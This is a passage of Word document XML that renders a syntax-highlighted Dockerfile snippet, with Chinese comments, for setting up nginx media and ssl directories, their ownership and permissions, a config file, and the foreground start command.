        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>&amp;&amp; mkdir -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">p </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>share</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>nginx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>media \</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>&amp;&amp; mkdir -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">p </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>share</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>nginx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ssl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>设置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Media</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>文件夹用户和用户组为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>默认</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">www-data, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>并给予可读和可执行权限</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>否则用户上传的图片无法正确显示。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>RUN chown -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">R www-data:www-data </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>share</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>nginx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>media \</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>&amp;&amp; chmod -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">R </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">775 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>share</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>nginx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>media</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>添加配置文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ADD </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">nginx.conf </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>nginx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>conf.d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>关闭守护模式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">CMD </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"nginx"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"-g"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"daemon off;"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FBAA9C" w14:textId="19619BC3" w:rsidR="00BE7374" w:rsidRDefault="00BE7374" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56618D98" w14:textId="5CDAA03D" w:rsidR="00BE7374" w:rsidRDefault="00BE7374" w:rsidP="009222EB">
